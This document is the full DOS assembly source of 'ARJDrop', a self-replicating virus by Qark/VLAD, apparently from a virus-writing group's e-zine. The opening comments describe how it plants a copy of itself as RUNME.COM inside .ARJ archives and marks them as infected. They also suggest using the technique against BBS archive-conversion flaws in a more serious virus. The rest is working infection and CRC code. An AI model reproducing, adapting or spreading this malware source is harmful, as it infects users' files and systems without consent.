; ARJDrop by Qark/VLAD
;
; When this virus is run it will search the current directory for any .ARJ
; archives. If it finds one, it copies itself into the archive, naming
; itself a file called RUNME.COM. It marks the archive as infected by
; setting the seconds field to 0. The RUNME.COM does exactly the same
; thing etc. So, it's like a companion archive infector. No, that doesn't
; sound right, maybe, just a nuisance trojan ? Anyway, it's too stupid
; to actually infect anywhere.
;
; This technique could be used very effectively in a serious virus that
; does COM/EXE as well. A lot of BBS's have a flaw in their security where
; their archive conversion isn't pathed, so if you put PKZIP.COM in a .ARJ
; file it will be executed, and vice versa. Using SCAN.COM and DOS utilities
; is a very effective use for this technique.
;
; If this was a resident virus on a BBS, every single archive anyone
; downloaded would have little RUNME.COMs inside.
;
mov ah,4eh
nextarj:
mov cx,3
mov dx,offset wildarj
int 21h
jnc openarc
int 20h
openarc:
mov ax,3d02h
mov dx,9eh
int 21h
mov bx,ax
mov ax,5700h
int 21h
mov word ptr time,cx
mov word ptr date,dx
and cx,1fh
or cx,cx
jnz notinfected
mov ah,3eh
int 21h
mov ah,4fh
jmp nextarj
notinfected:
call infectarj
mov ax,5701h
mov cx,word ptr time
and cx,0ffe0h
mov dx,word ptr date
int 21h
mov ah,3eh
int 21h
int 20h
wildarj db "*.ARJ",0
time dw 0
date dw 0
db "ARJDrop by Qark/VLAD"
infectarj proc near
;on entry bx=file handle
push ds
push es
push cs
pop ds
push cs
pop es
mov ax,4202h
xor cx,cx
cwd
int 21h
sub ax,4
sbb dx,0
mov cx,dx
mov dx,ax
mov ax,4200h
int 21h
mov word ptr csize,offset rend - 100h
mov word ptr osize,offset rend - 100h
mov cx,offset rend - 100h
mov si,100h ;start of program in memory
call crc32
cld
mov si,offset marker
mov di,offset sparebuff
mov cx,offset rend - offset marker
rep movsb
mov word ptr crc,ax
mov word ptr crc+2,dx
mov cx,word ptr bhsize
mov si,offset fhsize
call crc32
mov word ptr acrc,ax
mov word ptr acrc+2,dx
mov ah,40h
mov cx,offset fdata - offset marker
mov dx,offset marker
int 21h
mov ah,40h
mov cx,offset marker - 100h
mov dx,100h
int 21h
mov ah,40h
mov cx,offset rend - offset marker
mov dx,offset sparebuff
int 21h
mov ah,40h
mov cx,4
mov dx,offset fdend
int 21h
pop es
pop ds
ret
infectarj endp
crc32 proc near
;on entry cx=number of bytes to checksum
; si=pointer to bytes
;on exit dx:ax contains the checksum
;I stole this code from some PD sources I got off a BBS.
push bx
push cx
push si
push di
call gentable
mov dx,-1
mov ax,-1
crc32loop:
xor bx,bx
mov bl,byte ptr [si]
inc si
xor bl,al
shl bx,1
shl bx,1
mov al,ah
mov ah,dl
mov dl,dh
xor dh,dh
xor ax,word ptr [bx+crc32tab]
xor dx,word ptr [bx+crc32tab+2]
dec cx
jnz crc32loop
pop di
pop si
pop cx
pop bx
xor dx,-1
xor ax,-1
ret
crc32 endp
Gentable proc near
;Generates the 32bit crc table. Thanks to "Necrosoft Enterprises" who had
;this code inside their Dementia Virus. I have plenty of other code to do
;this, but it is all much, much bigger.
push ax
push cx
push dx
push di
mov di,offset crc32tab
xor cx,cx
outgen:
xor dx,dx
xor ax,ax
mov al,cl
push cx
mov cx,8
calcloop:
clc
rcr dx,1
rcr ax,1
jnc nocrcxor
xor dx,0edb8h
xor ax,8320h
nocrcxor:
loop calcloop
mov word ptr [di],ax
mov word ptr [di+2],dx
add di,4
pop cx
inc cx
cmp cx,100h
jne outgen
pop di
pop dx
pop cx
pop ax
ret
Gentable endp
rbuff:
marker db 60h,0eah
bhsize dw offset acrc - offset fhsize
fhsize db offset aname - offset fhsize
anum db 6
anum2 db 1
osver db 0
aflag db 0
ameth db 0 ;stored
aftype db 0 ;binary
ares db 0
dtm dd 0
csize dd 4 ;compressed size
osize dd 4 ;original size
crc dd 0
fspec dw 0
faccess dw 2
hstdata dw 0
aname db "RUNME.COM",0
acomm db 0
acrc dd 0
ehsize dw 0
fdata db "!"
fdend:
db 60h,0eah,0,0
rend:
crc32tab db 100h*4 dup (0)
sparebuff:
- VLAD AF INDEX -